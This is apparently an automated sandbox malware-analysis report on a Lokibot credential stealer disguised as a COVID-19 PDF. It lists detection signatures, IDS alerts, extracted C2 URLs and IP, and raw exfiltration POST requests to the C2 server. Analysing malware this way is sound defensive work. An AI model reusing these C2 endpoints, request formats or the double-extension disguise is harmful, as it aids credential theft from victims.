Windows Analysis Report RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe

Overview

General Information

Sample Name: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Analysis ID: 442954
MD5: ea646520496fd4603aaf0f5778231f0d
SHA1: 5112f3f6ae6a8a7cfac8364433128228c450f203
SHA256: a130cf9df18f1ae304826c98d4e7cfd2e75043b126a1df0c0a36f98a64cde5c2
Tags: exelokibot
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains method to dynamically call methods (often used by packers)
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://63.141.228.141/32.php/fn1ToJTMzu3Td"]}
Multi AV Scanner detection for domain / URL
Source: http://63.141.228.141/32.php/fn1ToJTMzu3Td Virustotal: Detection: 11% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\qvDFOnW.exe Virustotal: Detection: 34% Perma Link
Source: C:\Users\user\AppData\Roaming\qvDFOnW.exe ReversingLabs: Detection: 19%
Multi AV Scanner detection for submitted file
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Virustotal: Detection: 34% Perma Link
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe ReversingLabs: Detection: 19%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\qvDFOnW.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 6_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 6_2_00403D74

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49715 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49715 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49715 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49715 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49717 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49717 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49717 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49717 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49719 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49719 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49719 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49719 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49720 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49720 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49720 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49720 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49721 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49721 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49721 -> 63.141.228.141:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49721 -> 63.141.228.141:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor URLs: http://63.141.228.141/32.php/fn1ToJTMzu3Td
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 63.141.228.141 63.141.228.141
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NOCIXUS NOCIXUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FAC4DD3CContent-Length: 190Connection: close
Source: global traffic HTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FAC4DD3CContent-Length: 190Connection: close
Source: global traffic HTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FAC4DD3CContent-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FAC4DD3CContent-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FAC4DD3CContent-Length: 163Connection: close
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 6_2_00404ED4 recv, 6_2_00404ED4
Source: unknown HTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FAC4DD3CContent-Length: 190Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 01 Jul 2021 12:36:31 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 2
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000002.238593884.000000000302F000.00000004.00000001.sdmp String found in binary or memory: http://63.141.228.141/32.php/fn1ToJTMzu3Td
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000002.238593884.000000000302F000.00000004.00000001.sdmp String found in binary or memory: http://63.141.228.141/32.php/fn1ToJTMzu3Td?qM
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp, RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.221764921.0000000000F67000.00000004.00000040.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.com8
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.combi
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.comrsP
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.coms
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp String found in binary or memory: http://www.ibsensoftware.com/
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp String found in binary or memory: https://apple.com
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.221579092.0000000000B9B000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Loki Payload Author: kevoreilly
Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Detected potential crypto function
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_00B8E560 0_2_00B8E560
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_00B8E558 0_2_00B8E558
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_00B8BCB4 0_2_00B8BCB4
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF7770 0_2_04CF7770
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CFB198 0_2_04CFB198
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CFA2A8 0_2_04CFA2A8
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF1808 0_2_04CF1808
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF1807 0_2_04CF1807
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF1A5F 0_2_04CF1A5F
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF1A60 0_2_04CF1A60
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 6_2_0040549C 6_2_0040549C
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 6_2_004029D4 6_2_004029D4
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: String function: 00405B6F appears 42 times
PE file contains strange resources
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: qvDFOnW.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: qvDFOnW.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: qvDFOnW.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.221579092.0000000000B9B000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
